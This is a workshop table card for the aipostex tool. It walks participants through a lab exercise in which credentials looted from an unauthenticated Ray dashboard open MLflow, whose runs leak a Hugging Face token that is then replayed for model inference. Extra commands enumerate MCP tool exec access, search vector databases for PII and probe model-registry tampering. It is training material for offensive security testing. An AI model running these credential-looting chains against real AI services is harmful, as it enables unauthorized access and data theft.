aipostex — RTV Table Card¶
One-page quick reference for the hands-on tactic. Print one per table. Everything you need is on this card; the QR opens the full guide.
The mission¶
This lab is ACME's shadow-AI estate. One open Ray dashboard leaks a credential for another team's MLflow, which leaks an inference token for a third team's serving gateway — ending in real model generation. One foothold, three teams.
Three moves: map the estate → run one credential chain → score your coverage.
1 · Connect & smoke-test (5 min)¶
# Your VPN config + attack-box address are on the table.
./aipostex version # confirm the binary is here
mkdir -p ~/lab-results # everything you collect lands here for scoring
./aipostex discover network --target 172.16.50.10 --ports 3000 --mode detect # smoke test
2 · The guided chain (each hop loots the next hop's key)¶
# (1) Map the estate
./aipostex discover network --target 172.16.50.10,172.16.50.20,172.16.50.30,172.16.50.40 \
--format json -o ~/lab-results/discover.json
# (2) Ray dashboard (unauthenticated) — a job's runtime_env leaks the MLflow Basic credential
./aipostex ray --target http://172.16.50.20:8265 jobs \
--format json -o ~/lab-results/ray.json
# (3) MLflow gateway — authenticate with the Ray-looted Basic cred; a run param leaks an HF token
./aipostex mlflow --target http://172.16.50.30:5000 \
--header "Authorization: Basic <ray-looted-basic>" runs --limit 20 \
--format json -o ~/lab-results/mlflow.json
# (4) HF TGI gateway — replay the looted HF token for REAL model inference
./aipostex huggingface --target http://172.16.50.40:8180 \
--header "Authorization: Bearer <mlflow-looted-hf-token>" \
generate --prompt "incident response playbook" --force-exploit \
--format json -o ~/lab-results/hf.json
The
<...>placeholders are credentials you loot from the previous step's output — that hand-off is the whole point.
3 · Score your assessment¶
You get a report card: coverage of the planted findings, graded by proof strength (reached → read-with-credential → real execution). It grades what your scan surfaced — it doesn't spoil answers.
Finish early? Keep going on your estate¶
./aipostex mcp --target http://172.16.50.10:3000 enum # real MCP server: tools → exec/file/env
./aipostex vectordb --type chromadb --target 172.16.50.20:8000 search-sensitive --limit 50 # PII in RAG
./aipostex a2a --target http://172.16.50.40:8100 enum # agent-to-agent surface
./aipostex mlflow --target http://172.16.50.20:5000 registry # model registry tampering primitive
./aipostex wandb --target http://172.16.50.20:8444 enum # experiment-tracking secrets
Full menu: Attack Scenarios (12) in the guide. Stuck? Ask a room volunteer.
Take it home¶
- Tool — https://github.com/professor-moody/aipostex · Lab — https://github.com/professor-moody/aipostex-lab
- Run the whole estate on your own Proxmox/cloud, or point the tool at your own AI stack.
- Find a weird AI service in the wild → write a YAML template → lint → PR it.
